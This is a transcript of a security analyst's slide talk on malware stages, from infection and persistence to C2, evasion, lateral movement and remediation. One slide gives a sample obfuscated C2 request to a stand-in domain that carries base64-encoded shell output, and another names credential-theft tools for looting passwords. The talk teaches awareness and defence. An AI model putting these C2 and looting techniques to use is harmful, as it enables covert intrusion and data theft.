Reversing malware analysis trainingpart9 advanced malware analysis
ECrime presentation - A few bits about malware
-
Upload
michael-hendrickx -
Category
Internet
-
view
489 -
download
0
Transcript of ECrime presentation - A few bits about malware
A few bits about MalwareA story about trojan horses and rats.
$ whoami
• Michael Hendrickx• Senior Security Analyst @ HelpAG• Vulnerability Assessments• Social Engineering • Presentations • Created new undetected* RAT for the company• Belgian
* Until now
Malware attacks: a real threat
• Malware have caused a lot of damage• Many names: RAT’s, virus, Trojan,
rootkit, ransomware, …• Examples: Cryptolocker, Zeus,
BlackEnergy, …
• Targets differentplatforms:• Browsers• Smartphones• PC’s
Malware attacks: stages
• Malware attacks comes in 2 stages
Infection
Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
Persistence
AV evasion, persistence, looting, CNC connectivity,
lateral movement
“you’re in trouble”
Malware attacks: infection
• Stage 1: modes of Infection
Exploited Software Bugs
(Spear) phishing
Waterhole attack
Malicious USB
Malware attacks: infection
• Exploited software bugs• Attacker hacks into vulnerable service• Could be anything:• SQL injection on website leads to code execution• Poorly implemented upload functionality• Unpatched server software• Man in the Middle• Weak passwords• …
Malware attacks: infection
• Spear phishing• Very specific message to single or very few victims• Holds malicious payload• Macro, PDF, renamed files,
trojaned archives, …• Or, links to malicious file:• Needs to be downloaded, won’t
get caught by your AV.
Malware attacks: infection
• Waterhole attack• Indirect targeted attack• Attacker compromises sites that the victim probably visits.• Exploits outdated browser or plugins• Forces install of malware
“your flash player is outdated”“you should update Java”
Malware attacks: infection
• Evil USB dongle• USB peripheral can be anything• USB hard drive / dongle• Keyboard, WIFI / network adapter,
Microphone, …• Hub with any of the above• Example: USB rubber ducky• Looks like dongle, is a keyboard• Types 1000 words per minute• Is only 30 USD
Malware attacks: stages
• On to stage 2:
Infection
Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
Persistence
AV evasion, persistence, looting, CNC connectivity,
lateral movement
Malware attacks: persistence
• Stage 2: Persistence• Execution persistence• Ensure that our malware keeps on running• CnC Connectivity• Listen for commands• AV Evasion / Hiding• To prevent malware from being detected, removed• Lateral movement• Infect more machines
Malware attacks: Execution persistence
• Ensure malware keeps on running• Startup folder• Registry keys• Automatic Services• Browser plugins / helper objects• You’re re-infected whenever the browser is
opened• Infected document templates• Every time a word/ppt/excel file is opened or created, you’re re-infected.
Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
Malware attacks: CnC connectivity
• Direct traffic• Probably (hopefully) detected and blocked
• HTTP Tunnel• May get detected by L7 firewalls• “deep packet inspection”, pretty shallow
• HTTPS• Difficult to see what’s happening, unless MITM.
• DNS Tunneling• Usually gets “proxied” to target DNS server• Do you monitor anomalies?
• Peer to peer WIFI network
Hi, I’m an ad-hoc wifi network
Up to 10 – 20 meters
Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic
POST /css/cc.aspx HTTP/1.1Accept: text/html;q=0.8,application/xml,*/*Accept-Language: en-gb;q=0.8,enContent-Type: application/x-www-form-urlencodedCookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Host: www.thisisafakedomain.comContent-Length: 277Connection: Keep-Alive
__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.
1:Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\hendrickx\ownCloud>dir c:/Invalid switch - "".
C:\Users\hendrickx\ownCloud>
Malware attacks: hiding
• Hiding• Download multiple stages
Dropper
Malicious Payload
(Real Virus)
Infect victim
Can I reach the Internet?
Does payload get detected?
Malware attacks: hiding
• Multi stage download ensures correct victim
Malicious Payload
(Real Virus)
Infect victim
Can I reach the Internet?
Dropper
Innocent Payload
This is not the IP / Company / country I’m targeting
Cool, I’ll install it
Bingo!
Malware attacks: lateral movement
• Exfiltration of information• Documents (%userprofile%\documents)• Passwords (mimikatz, Lazagne)• Browser history• Emails, files, …
• Recon / Infect the network• Ping other machines• File shares• (Sharepoint) portals
Remediation
• Human factor: don’t get infected• Social Engineering exercises• Awareness• Alerting IT security (“Support, I think I did
something wrong”)
• Technical factor: prevent, detect, destroy• Tight controls on end points• Monitor inbound programs (attachments, downloads, …)• Monitor network usage • DNS Anomalies, unidentified protocols, …• Regular scanning with AV, IOC detectors, …• Such as Loki: (https://github.com/Neo23x0/Loki)
Thank you!
Questions?
Don’t accept any USB dongles from me!
CONTACT US | WWW.HELPAG.COM | [email protected] DUBAI, UAEARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741T +971 4 440 5666F +971 4 363 6742
ABU DHABI, UAESALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195T +971 2 644 3398F +971 2 639 1155
DOHA, QATARAL DAFNA – PALM TOWEROFFICE 4803, WEST BAY, P.O. BOX 31316T +974 4432 8067 F +974 4432 8069